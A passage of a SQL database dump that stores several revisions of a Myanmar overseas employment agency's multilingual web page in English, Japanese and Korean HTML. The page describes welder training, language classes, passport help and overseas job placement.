lang=\"KO\">사업</span><o:p></o:p></p><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp;6. &nbsp;두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사람들을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기본</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">과정과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요하는 &nbsp; &nbsp; &nbsp; &nbsp; 경우에&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">컴퓨터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">많은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">과정들과 연결하고 취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를 하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; 7. 상기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\">&nbsp; </span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">IRIS(International Recruitment Integrity System)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">윤리적</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">채용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공정한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노동</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관행 &nbsp; &nbsp; &nbsp; 의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">마련하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공합니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 24, 249, 'en', 0, '<p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p>', '', 'full_html'),
('page', 0, 24, 249, 'ja', 0, '<p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タインなどで働きたい学生達のためにも英語など必要な場合に応じて、パ &nbsp;ソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビー &nbsp;スをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p>', '', 'full_html'),
('page', 0, 24, 249, 'ko', 0, '<p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어,일본어,영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p>', '', 'full_html'),
('page', 0, 24, 252, 'en', 0, '<p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p>', '', 'full_html'),
('page', 0, 24, 252, 'ja', 0, '<p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タインなどで働きたい学生達のためにも英語など必要な場合に応じて、パ &nbsp;ソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビー &nbsp;スをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p>', '', 'full_html'),
('page', 0, 24, 252, 'ko', 0, '<p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어,일본어,영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p>', '', 'full_html'),
('page', 0, 24, 253, 'en', 0, '<p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p>', '', 'full_html'),
